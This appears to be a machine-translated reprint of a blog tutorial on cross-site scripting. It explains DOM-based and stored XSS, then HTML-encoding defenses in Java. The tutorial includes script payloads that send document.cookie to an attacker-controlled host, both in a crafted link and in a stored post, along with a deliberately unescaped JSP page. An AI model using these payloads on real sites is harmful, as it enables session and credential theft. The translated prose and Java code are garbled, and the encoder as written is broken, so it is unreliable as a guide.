XSS attacks and defenses

This article from: Gao | Coder, the original address: http://blog.csdn.net/ghsau/article/details/17027893, reprint please specify.
XSS, also known as CSS, the full cross-sitescript, multi-site scripting attacks, is a common vulnerability in web programs, XSS is passive and used for client attack, so easy is ignored its harmfulness. The principle is that an attacker would enter (pass in) malicious HTML code into a site with an XSS vulnerability, and when other users browsed the site, the HTML code would run on its own initiative to achieve the purpose of the attack. For example, stealing user cookies, destroying page structures, redirecting to other sites, and so on.

XSS attack

XSS attack is similar to SQL injection attack, we first found an XSS vulnerability in the site, XSS vulnerability is divided into two, one is the DOM Based XSS vulnerability, there is a stored XSS vulnerability. Theoretically, the input data is not processed in all the inputs, there is an XSS vulnerability, the vulnerability depends on the power of the attack code, the attack code is not limited to script.

DOM Based XSS

Dom Based XSS is an attack that is based on the structure of a Web page DOM, which is characterized by a minority of people in the Strokes.

Scenario One :

When I log in to a.com, I find that some of its content is directly displayed based on a URL called a content parameter, and it is possible that the page processing is similar to other languages:

<%@ page language="java"contentType="text/html; Charset=utf-8 "pageencoding=" UTF-8 "%> <! DOCTYPE HTML Public "-//w3c//dtd HTML 4.01 transitional//en" "Http://www.w3.org/TR/html4/loose.dtd" > < HTML > < Head > < title > XSS test </title> </ Head > < Body > Page content:<%=request.getparameter ("Content")%> </ Body > </ HTML >

I got it. Tom also registered the site, and know his mailbox (or other can receive information contact), I made a hyperlink to him, the hyperlink address is: Http://www.a.com?content=<script>window.open ( "Www.b.com?param=" +document.cookie) </script> When Tom clicks on the link (if he's already signed in A.com), The browser will open B.Com directly, and Tom in the A.com cookie information sent to b.com,b.com is I set up the site, when my site received this information, I stole Tom in a.com cookie information, the cookie information may exist in password, attack Hit success! In the process, the victim had only Tom himself. That when I enter A.com?content=<script>alert ("XSS") </script&gt in the browser, the browser will run my script while the page content is displayed, the page outputs the XSS word, which is attacking myself, How do I attack others and make a profit?

Stored XSS

Stored XSS is a stored XSS vulnerability because its attack code has been stored on the server or in the database, so the victim is very many people.

Scenario Two :

A.com can send articles, I log in a.com published an article, the article includes the malicious code, <script>window.open ("www.b.com?param=" +document.cookie) </ Script> Save the article. Then Tom and Jack saw my published article, when the view of my article is all in the move, their cookie information is sent to my server, the attack success! In this process, the victim is more than one person.
Stored XSS Vulnerability is more harmful, the harm surface is more extensive.

XSS Defense

We are in a contradictory world, with spears there are shields. Just to get our code out of the hole, the attacker doesn't have to, we're going to make an egg that's not sewn. XSS defenses have for example the following ways.

Intact filtration System

Never trust the user's input. The user's input needs to be processed, just agree to enter a valid value, the other values are filtered out.

Html encode

If in some cases we cannot strictly filter the user data, we also need to convert the tags.

Less-than character (<)	&lt;
Greater-than character (>)	&gt;
Ampersand character (&)	&amp;
Double-quote character (")	&quot;
Space character ()	&nbsp;
Any ASCII code character whose code was Greater-than or equal to 0x80	&#<number>, where <number> is the ASCII character value.

For example, the user input: <script>window.location.href= "http://www.baidu.com"; </script> after saving it, the store will be: &lt;script &gt;window.location.href=&quot;http://www.baidu.com&quot;&lt;/script&gt; In the presentation, the browser converts these characters into text content instead of a piece of code that can be run.

The other following methods are available for two HTML encode.

• Using Apache's Commons-lang.jar

  Stringescapeutils.escapehtml (str);//kanji will be converted to the corresponding ASCII code, space does not convert

• Implement the conversion yourself, just convert some characters

  Private Static String HtmlEncode (char c) { Switch (c) { Case ' & ': return "&amp;"; Case ' < ': return "&lt;"; Case ' > ': return "&gt;"; Case ' "': return "&quot;"; Case "': return "&nbsp;"; default: return C +""; } } /** to the passed-in string Str make Html encode Conversion */ Public static String HtmlEncode (String str) { if   (str = =Null | | Str.trim (). Equals ("")) return str; StringBuilder Encodestrbuilder = new StringBuilder (); for (int i = 0, Len = str.length (); i < Len; i++) { Encodestrbuilder.append (htmlEncode(Str.charat (i))); } return encodestrbuilder.tostring (); }

Finish
This article from: Gao | Coder, the original address: http://blog.csdn.net/ghsau/article/details/17027893, reprint please specify.

XSS attacks and defenses